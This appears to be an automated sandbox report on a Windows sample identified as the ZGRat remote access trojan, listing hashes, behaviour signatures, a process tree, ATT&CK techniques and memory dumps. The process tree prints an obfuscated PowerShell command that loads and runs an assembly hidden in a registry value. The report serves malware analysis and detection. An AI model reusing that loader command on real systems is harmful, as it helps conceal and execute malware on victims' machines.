Analysis

  • max time kernel
    150s
  • max time network
    99s
  • platform
    windows7_x64
  • resource
    win7-20231129-en
  • resource tags

    arch:x64arch:x86image:win7-20231129-enlocale:en-usos:windows7-x64system
  • submitted
    14-05-2024 05:31

General

  • Target

    file.exe

  • Size

    4.5MB

  • MD5

    96422a2b982c99614d31dff7f2b64680

  • SHA1

    e8f25aa518b0ef54bcdf770479ef28dd99dd8efc

  • SHA256

    fe74f06d7437d213d96466b4475db2809c60a4e8aced9df338f4a71cf9bc7c16

  • SHA512

    882beba69a0ab2d6f7d048ecb4666b9ba4fe3ea17387ece13fb5bd589ce0db4d7343fbce6e2d836192aed2a920aae4edd1f4b6fa090fe807d54e024dbc234de9

  • SSDEEP

    24576:Epu+lTdASQBeSbtpO2+RZ8XK5OG/wS4gIVnxff9t+oQ9GXiqgbaaz2ub2UbRdL/h:EX

Malware Config

Signatures

  • Detect ZGRat V1 34 IoCs
  • Modifies security service 2 TTPs 2 IoCs
  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • ZGRat

    ZGRat is remote access trojan written in C#.

  • Drops startup file 1 IoCs
  • Executes dropped EXE 2 IoCs
  • Loads dropped DLL 2 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Drops file in System32 directory 1 IoCs
  • Suspicious use of SetThreadContext 3 IoCs
  • Modifies data under HKEY_USERS 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 5 IoCs
  • Suspicious use of WriteProcessMemory 54 IoCs

Processes

  • C:\Windows\system32\winlogon.exe
    winlogon.exe
    1⤵
      PID:436
      • C:\Windows\System32\dllhost.exe
        C:\Windows\System32\dllhost.exe /Processid:{bdc85aa1-fb2b-4e86-b5f7-d1bdea809142}
        2⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:3052
    • C:\Windows\system32\services.exe
      C:\Windows\system32\services.exe
      1⤵
        PID:480
        • C:\Windows\system32\svchost.exe
          C:\Windows\system32\svchost.exe -k DcomLaunch
          2⤵
            PID:592
          • C:\Windows\system32\svchost.exe
            C:\Windows\system32\svchost.exe -k RPCSS
            2⤵
              PID:672
            • C:\Windows\System32\svchost.exe
              C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
              2⤵
              • Modifies security service
              PID:744
            • C:\Windows\System32\svchost.exe
              C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted
              2⤵
                PID:812
                • C:\Windows\system32\Dwm.exe
                  "C:\Windows\system32\Dwm.exe"
                  3⤵
                    PID:1336
                • C:\Windows\system32\svchost.exe
                  C:\Windows\system32\svchost.exe -k netsvcs
                  2⤵
                    PID:864
                    • C:\Windows\system32\taskeng.exe
                      taskeng.exe {193CB52A-8235-40A2-B829-15996F0C90FC} S-1-5-18:NT AUTHORITY\System:Service:
                      3⤵
                      • Suspicious use of WriteProcessMemory
                      PID:2060
                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+'S'+''+[Char](79)+''+'F'+'T'+[Char](87)+'A'+[Char](82)+'E').GetValue('$'+[Char](55)+'7'+[Char](115)+''+[Char](116)+''+'a'+''+[Char](103)+''+[Char](101)+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"
                        4⤵
                        • Suspicious use of NtCreateUserProcessOtherParentProcess
                        • Drops file in System32 directory
                        • Suspicious use of SetThreadContext
                        • Modifies data under HKEY_USERS
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        • Suspicious use of WriteProcessMemory
                        PID:2632
                  • C:\Windows\system32\svchost.exe
                    C:\Windows\system32\svchost.exe -k LocalService
                    2⤵
                      PID:1004
                    • C:\Windows\system32\svchost.exe
                      C:\Windows\system32\svchost.exe -k NetworkService
                      2⤵
                        PID:296
                      • C:\Windows\System32\spoolsv.exe
                        C:\Windows\System32\spoolsv.exe
                        2⤵
                          PID:920
                        • C:\Windows\system32\svchost.exe
                          C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork
                          2⤵
                            PID:344
                          • C:\Windows\system32\taskhost.exe
                            "taskhost.exe"
                            2⤵
                              PID:1252
                            • C:\Windows\system32\svchost.exe
                              C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation
                              2⤵
                                PID:2664
                              • C:\Windows\system32\sppsvc.exe
                                C:\Windows\system32\sppsvc.exe
                                2⤵
                                  PID:1680
                              • C:\Windows\system32\lsass.exe
                                C:\Windows\system32\lsass.exe
                                1⤵
                                  PID:496
                                • C:\Windows\system32\lsm.exe
                                  C:\Windows\system32\lsm.exe
                                  1⤵
                                    PID:504
                                  • C:\Windows\Explorer.EXE
                                    C:\Windows\Explorer.EXE
                                    1⤵
                                      PID:1376
                                      • C:\Users\Admin\AppData\Local\Temp\file.exe
                                        "C:\Users\Admin\AppData\Local\Temp\file.exe"
                                        2⤵
                                        • Drops startup file
                                        • Loads dropped DLL
                                        • Suspicious use of SetThreadContext
                                        • Suspicious behavior: EnumeratesProcesses
                                        • Suspicious use of AdjustPrivilegeToken
                                        • Suspicious use of WriteProcessMemory
                                        PID:1972
                                        • C:\Users\Admin\AppData\Local\Temp\$7795bd29
                                          "C:\Users\Admin\AppData\Local\Temp\$7795bd29"
                                          3⤵
                                          • Executes dropped EXE
                                          PID:2520
                                        • C:\Users\Admin\AppData\Local\Temp\$772ce69d
                                          "C:\Users\Admin\AppData\Local\Temp\$772ce69d"
                                          3⤵
                                          • Executes dropped EXE
                                          • Adds Run key to start application
                                          PID:1036
                                    • C:\Windows\system32\conhost.exe
                                      \??\C:\Windows\system32\conhost.exe "-5736592181577275068164228039811597435481741225853-1205417798-1395281556-412873299"
                                      1⤵
                                        PID:1956

                                      Network

                                      MITRE ATT&CK Matrix ATT&CK v13

                                      Persistence

                                      Create or Modify System Process

                                      1
                                      T1543

                                      Windows Service

                                      1
                                      T1543.003

                                      Boot or Logon Autostart Execution

                                      1
                                      T1547

                                      Registry Run Keys / Startup Folder

                                      1
                                      T1547.001

                                      Privilege Escalation

                                      Create or Modify System Process

                                      1
                                      T1543

                                      Windows Service

                                      1
                                      T1543.003

                                      Boot or Logon Autostart Execution

                                      1
                                      T1547

                                      Registry Run Keys / Startup Folder

                                      1
                                      T1547.001

                                      Defense Evasion

                                      Modify Registry

                                      2
                                      T1112

                                      Replay Monitor

                                      Loading Replay Monitor...

                                      Downloads

                                      • \Users\Admin\AppData\Local\Temp\$7795bd29
                                        Filesize

                                        4.5MB

                                        MD5

                                        96422a2b982c99614d31dff7f2b64680

                                        SHA1

                                        e8f25aa518b0ef54bcdf770479ef28dd99dd8efc

                                        SHA256

                                        fe74f06d7437d213d96466b4475db2809c60a4e8aced9df338f4a71cf9bc7c16

                                        SHA512

                                        882beba69a0ab2d6f7d048ecb4666b9ba4fe3ea17387ece13fb5bd589ce0db4d7343fbce6e2d836192aed2a920aae4edd1f4b6fa090fe807d54e024dbc234de9

                                      • memory/1972-30-0x0000000005FC0000-0x00000000061FA000-memory.dmp
                                        Filesize

                                        2.2MB

                                      • memory/1972-6-0x0000000005FC0000-0x00000000061FA000-memory.dmp
                                        Filesize

                                        2.2MB

                                      • memory/1972-3-0x0000000005FC0000-0x00000000061FA000-memory.dmp
                                        Filesize

                                        2.2MB

                                      • memory/1972-4-0x0000000005FC0000-0x00000000061FA000-memory.dmp
                                        Filesize

                                        2.2MB

                                      • memory/1972-18-0x0000000005FC0000-0x00000000061FA000-memory.dmp
                                        Filesize

                                        2.2MB

                                      • memory/1972-24-0x0000000005FC0000-0x00000000061FA000-memory.dmp
                                        Filesize

                                        2.2MB

                                      • memory/1972-22-0x0000000005FC0000-0x00000000061FA000-memory.dmp
                                        Filesize

                                        2.2MB

                                      • memory/1972-40-0x0000000005FC0000-0x00000000061FA000-memory.dmp
                                        Filesize

                                        2.2MB

                                      • memory/1972-12-0x0000000005FC0000-0x00000000061FA000-memory.dmp
                                        Filesize

                                        2.2MB

                                      • memory/1972-28-0x0000000005FC0000-0x00000000061FA000-memory.dmp
                                        Filesize

                                        2.2MB

                                      • memory/1972-44-0x0000000005FC0000-0x00000000061FA000-memory.dmp
                                        Filesize

                                        2.2MB

                                      • memory/1972-46-0x0000000005FC0000-0x00000000061FA000-memory.dmp
                                        Filesize

                                        2.2MB

                                      • memory/1972-48-0x0000000005FC0000-0x00000000061FA000-memory.dmp
                                        Filesize

                                        2.2MB

                                      • memory/1972-50-0x0000000005FC0000-0x00000000061FA000-memory.dmp
                                        Filesize

                                        2.2MB

                                      • memory/1972-56-0x0000000005FC0000-0x00000000061FA000-memory.dmp
                                        Filesize

                                        2.2MB

                                      • memory/1972-60-0x0000000005FC0000-0x00000000061FA000-memory.dmp
                                        Filesize

                                        2.2MB

                                      • memory/1972-62-0x0000000005FC0000-0x00000000061FA000-memory.dmp
                                        Filesize

                                        2.2MB

                                      • memory/1972-66-0x0000000005FC0000-0x00000000061FA000-memory.dmp
                                        Filesize

                                        2.2MB

                                      • memory/1972-64-0x0000000005FC0000-0x00000000061FA000-memory.dmp
                                        Filesize

                                        2.2MB

                                      • memory/1972-20-0x0000000005FC0000-0x00000000061FA000-memory.dmp
                                        Filesize

                                        2.2MB

                                      • memory/1972-54-0x0000000005FC0000-0x00000000061FA000-memory.dmp
                                        Filesize

                                        2.2MB

                                      • memory/1972-52-0x0000000005FC0000-0x00000000061FA000-memory.dmp
                                        Filesize

                                        2.2MB

                                      • memory/1972-42-0x0000000005FC0000-0x00000000061FA000-memory.dmp
                                        Filesize

                                        2.2MB

                                      • memory/1972-38-0x0000000005FC0000-0x00000000061FA000-memory.dmp
                                        Filesize

                                        2.2MB

                                      • memory/1972-36-0x0000000005FC0000-0x00000000061FA000-memory.dmp
                                        Filesize

                                        2.2MB

                                      • memory/1972-34-0x0000000005FC0000-0x00000000061FA000-memory.dmp
                                        Filesize

                                        2.2MB

                                      • memory/1972-32-0x0000000005FC0000-0x00000000061FA000-memory.dmp
                                        Filesize

                                        2.2MB

                                      • memory/1972-0-0x0000000074A5E000-0x0000000074A5F000-memory.dmp
                                        Filesize

                                        4KB

                                      • memory/1972-26-0x0000000005FC0000-0x00000000061FA000-memory.dmp
                                        Filesize

                                        2.2MB

                                      • memory/1972-2-0x0000000005FC0000-0x0000000006200000-memory.dmp
                                        Filesize

                                        2.2MB

                                      • memory/1972-58-0x0000000005FC0000-0x00000000061FA000-memory.dmp
                                        Filesize

                                        2.2MB

                                      • memory/1972-16-0x0000000005FC0000-0x00000000061FA000-memory.dmp
                                        Filesize

                                        2.2MB

                                      • memory/1972-14-0x0000000005FC0000-0x00000000061FA000-memory.dmp
                                        Filesize

                                        2.2MB

                                      • memory/1972-10-0x0000000005FC0000-0x00000000061FA000-memory.dmp
                                        Filesize

                                        2.2MB

                                      • memory/1972-8-0x0000000005FC0000-0x00000000061FA000-memory.dmp
                                        Filesize

                                        2.2MB

                                      • memory/1972-4884-0x0000000002450000-0x000000000249C000-memory.dmp
                                        Filesize

                                        304KB

                                      • memory/1972-4883-0x00000000025A0000-0x000000000261E000-memory.dmp
                                        Filesize

                                        504KB

                                      • memory/1972-4885-0x0000000074A50000-0x000000007513E000-memory.dmp
                                        Filesize

                                        6.9MB

                                      • memory/1972-4886-0x0000000074A50000-0x000000007513E000-memory.dmp
                                        Filesize

                                        6.9MB

                                      • memory/1972-4887-0x0000000074A5E000-0x0000000074A5F000-memory.dmp
                                        Filesize

                                        4KB

                                      • memory/1972-4888-0x0000000074A50000-0x000000007513E000-memory.dmp
                                        Filesize

                                        6.9MB

                                      • memory/1972-4889-0x0000000074A50000-0x000000007513E000-memory.dmp
                                        Filesize

                                        6.9MB

                                      • memory/1972-1-0x0000000000AB0000-0x0000000000F36000-memory.dmp
                                        Filesize

                                        4.5MB

                                      • memory/1972-4944-0x0000000074A50000-0x000000007513E000-memory.dmp
                                        Filesize

                                        6.9MB

                                      • memory/1972-4917-0x0000000002530000-0x0000000002584000-memory.dmp
                                        Filesize

                                        336KB

                                      • memory/2520-4909-0x0000000000400000-0x000000000042B000-memory.dmp
                                        Filesize

                                        172KB

                                      • memory/2632-4911-0x000007FEF5BD0000-0x000007FEF656D000-memory.dmp
                                        Filesize

                                        9.6MB

                                      • memory/2632-4912-0x000007FEF5BD0000-0x000007FEF656D000-memory.dmp
                                        Filesize

                                        9.6MB

                                      • memory/2632-4913-0x000007FEF5BD0000-0x000007FEF656D000-memory.dmp
                                        Filesize

                                        9.6MB

                                      • memory/2632-4914-0x0000000019FD0000-0x000000001A2B2000-memory.dmp
                                        Filesize

                                        2.9MB

                                      • memory/2632-4915-0x000007FEF5BD0000-0x000007FEF656D000-memory.dmp
                                        Filesize

                                        9.6MB

                                      • memory/2632-4916-0x0000000000870000-0x0000000000878000-memory.dmp
                                        Filesize

                                        32KB

                                      • memory/2632-4910-0x000007FEF5E8E000-0x000007FEF5E8F000-memory.dmp
                                        Filesize

                                        4KB

                                      • memory/2632-4945-0x000007FEF5BD0000-0x000007FEF656D000-memory.dmp
                                        Filesize

                                        9.6MB

                                      • memory/2632-4946-0x0000000001370000-0x000000000139A000-memory.dmp
                                        Filesize

                                        168KB

                                      • memory/2632-5112-0x000007FEF5BD0000-0x000007FEF656D000-memory.dmp
                                        Filesize

                                        9.6MB

                                      • memory/2632-5113-0x000007FEF5E8E000-0x000007FEF5E8F000-memory.dmp
                                        Filesize

                                        4KB